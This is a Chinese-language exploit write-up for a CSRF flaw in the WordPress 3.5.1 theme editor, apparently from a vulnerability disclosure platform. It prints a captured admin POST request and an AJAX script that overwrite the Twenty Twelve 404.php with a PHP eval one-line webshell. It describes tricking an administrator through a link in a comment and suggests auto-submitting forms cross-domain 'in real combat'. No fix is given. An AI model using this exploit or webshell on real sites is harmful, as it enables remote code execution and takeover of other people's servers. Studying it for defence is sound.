wordpress3.5.1后台修改主题模版处防CSRF不严,前台评论可加入超链接,可写上诱惑性东西 骗取管理员点击后写入一句话木马
进入后台-外观-编辑。选择编辑Twenty Twelve主题下的404.php文件。将原内容去掉,换成一句话木马,同时打开抓包工具。


wordpress后台CSRF不严,管理员访问某些链接可拿shell


更新后抓到包


 

post Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: ?file=404.php&theme=twentytwelve Cookie: wordpress_1233097993469c07c80a9cb529880b71=admin%7C1364700254%7Cb875aa22d9bb88383aa6f9b1628dd86b; wp-settings-time-1=1364445495; comment_author_1233097993469c07c80a9cb529880b71=test; comment_author_email_1233097993469c07c80a9cb529880b71=632117384%40qq.com; wp-settings-1=editor%3Dhtml; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_1233097993469c07c80a9cb529880b71=admin%7C1364700254%7C082956c79c01926f6f107ccd131dade7; s5wJ_2132_saltkey=uNFgCP80; s5wJ_2132_lastvisit=1364366389; s5wJ_2132_ulastactivity=591affdyS6zMRtF88Jad%2BTVr47oX95MIizEQOFn8RMF%2BN%2FpUUHdw Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 268 _wpnonce=b6cda66293&_wp_http_referer=%2Fwp%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentytwelve&newcontent=%3C%3Fphp+eval%28%24_GET%5Ba%5D%29%3B%3F%3E&action=update&file=404.php&theme=twentytwelve&scrollto=0&submit=%E6%9B%B4%E6%96%B0%E6%96%87%E4%BB%B6

由于本地演示,用AJAX进行CSRF攻击。

编写localhost/wp.html文件。内容为


 

<script> function CreateRquest(){ var httpRequest; try{ httpRequest=new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){ try{ httpRequest=new ActiveXObject("Microsoft.XMLHTTP"); }catch(e1){ httpRequest=new XMLHttpRequest(); } } return httpRequest; } var request=CreateRquest(); request.open("post","",true); request.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); var a="_wpnonce=b6cda66293&_wp_http_referer=%2Fwp%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentytwelve&newcontent=<?php eval($_GET[a]);?>&action=update&file=404.php&theme=twentytwelve&scrollto=0&submit=%E6%9B%B4%E6%96%B0%E6%96%87%E4%BB%B6"; request.send(a); </script>

将被修改的404.PHP恢复,并且在前台评论写入<a href="">管理员,有一篇文章也讲到了这个问题

管理员登录后台查看评论。点击链接后

Twenty Twelve主题下的404.php已被成功修改为一句话木马


wordpress后台CSRF不严,管理员访问某些链接可拿shell


访问一句话木马


 

wordpress后台CSRF不严,管理员访问某些链接可拿shell



攻击成功,AJAX仅为演示,实战中可用JS控制表单自动提交来实现跨域传输数据。

修复方案:

你们比我懂